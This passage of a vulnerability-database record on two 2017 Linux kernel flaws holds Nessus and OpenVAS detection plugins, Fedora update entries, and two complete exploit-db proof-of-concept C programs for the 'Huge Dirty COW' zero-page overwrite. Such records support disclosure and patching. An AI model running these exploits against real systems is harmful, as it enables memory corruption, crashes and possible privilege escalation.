script_set_attribute(\n 
attribute:\"description\",\n value:\n\"The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1070805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000405/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16939/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20173225-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28062366\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 
12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Live Patching 12-SP3:zypper in -t patch\nSUSE-SLE-Live-Patching-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise High Availability 12-SP3:zypper in -t patch\nSUSE-SLE-HA-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-2006=1\n\nSUSE Container as a Service Platform ALL:zypper in -t patch\nSUSE-CAASP-ALL-2017-2006=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debugsource-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-devel-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-syms-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.92-6.30.1\")) flag++;\nif 
(rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.92-6.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-09T05:39:07", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-08T00:00:00", "title": "Ubuntu 16.04 LTS : linux-azure vulnerabilities (USN-3511-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-08T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.11-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure"], "id": "UBUNTU_USN-3511-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105107", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3511-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105107);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n script_xref(name:\"USN\", value:\"3511-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-azure vulnerabilities (USN-3511-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. 
(CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3511-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected linux-image-4.11-azure and / or linux-image-azure\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.11-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3511-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.11.0-1016-azure\", pkgver:\"4.11.0-1016.16\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-azure\", pkgver:\"4.11.0.1016.16\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = 
ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.11-azure / linux-image-azure\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405"], "description": "The kernel meta package ", "modified": "2017-12-04T19:05:31", "published": "2017-12-04T19:05:31", "id": "FEDORA:3CCDE601B23D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.13.16-302.fc27", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405"], "description": "The kernel meta package ", "modified": "2017-12-04T20:15:47", "published": "2017-12-04T20:15:47", "id": "FEDORA:22E2B607603F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: kernel-4.13.16-202.fc26", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2017-12-01T13:01:22", "description": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page. CVE-2017-1000405. Dos exploit for Linux platform", "published": "2017-11-30T00:00:00", "type": "exploitdb", "title": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000405"], "modified": "2017-11-30T00:00:00", "id": "EDB-ID:43199", "href": "https://www.exploit-db.com/exploits/43199/", "sourceData": "// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0\r\n// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC\r\n// Author Note: Before running, make sure to set transparent huge pages to \"always\": \r\n// `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`\r\n//\r\n\r\n//\r\n// The Huge Dirty Cow POC. 
This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. 
\r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] 
madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43199/"}, {"lastseen": "2018-05-24T14:08:25", "description": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2). CVE-2017-1000405. 
Dos exploit for Linux platform", "published": "2017-12-11T00:00:00", "type": "exploitdb", "title": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000405"], "modified": "2017-12-11T00:00:00", "id": "EDB-ID:44305", "href": "https://www.exploit-db.com/exploits/44305/", "sourceData": "/*\r\n * The code is modified from https://www.exploit-db.com/exploits/43199/\r\n */\r\n#define _GNU_SOURCE\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <sys/stat.h>\r\n#include <sched.h>\r\n#include <pthread.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define TRIES_PER_PAGE (20000000)\r\n#define PAGE_SIZE (0x1000)\r\n#define MEMESET_VAL (0x41)\r\n#define MAP_SIZE (0x200000)\r\n#define STRING \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n#define OFFSIZE ((sizeof(STRING)-1)/sizeof(char))\r\n\r\nstruct args{\r\n int fd;\r\n void *p;\r\n int stop;\r\n off_t off;\r\n char *chp;\r\n};\r\n\r\nvoid *write_thread(struct args *arg) {\r\n for (int i = 0; i < TRIES_PER_PAGE && !arg->stop; i++) {\r\n lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);\r\n write(arg->fd, STRING, sizeof(STRING));\r\n lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);\r\n }\r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct args *arg) {\r\n while(*(arg->chp+arg->off*OFFSIZE) != 'A') {\r\n int i = madvise(arg->p, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n arg->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main(void) {\r\n struct args arg;\r\n\r\n arg.off = 0;\r\n \r\n arg.p = mmap((void*)0x40000000, MAP_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\r\n \r\n if(arg.p == MAP_FAILED)\r\n perror(\"[!] 
mmap()\");\r\n arg.chp = arg.p;\r\n printf(\"mmap address is %p\\n\", arg.p);\r\n madvise(arg.p, MAP_SIZE, MADV_HUGEPAGE);\r\n\r\n arg.fd = open(\"/proc/self/mem\", O_RDWR);\r\n if (arg.fd < 0) {\r\n perror(\"[!] open()\");\r\n return 1;\r\n }\r\n \r\n \r\n while(arg.off < PAGE_SIZE/sizeof(STRING)) {\r\n arg.stop = 0;\r\n pthread_t thread0, thread1;\r\n int ret = pthread_create(&thread0, NULL, (void *)wait_for_success, &arg);\r\n ret |= pthread_create(&thread1, NULL, (void *)write_thread, &arg);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n return 1;\r\n }\r\n \r\n pthread_join(thread0, NULL);\r\n pthread_join(thread1, NULL); \r\n \r\n printf(\"[*] Done 0x%x String\\n\", arg.off);\r\n arg.off++;\r\n }\r\n printf(\"[*] Overwrite a page\\n\");\r\n printf(\"%s\\n\", arg.p);\r\n return 0;\r\n}", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44305/"}], "openvas": [{"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873860", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873860", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-b0c1f44130", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_b0c1f44130_kernel_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-b0c1f44130\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the 
Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873860\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:55:57 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-b0c1f44130\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 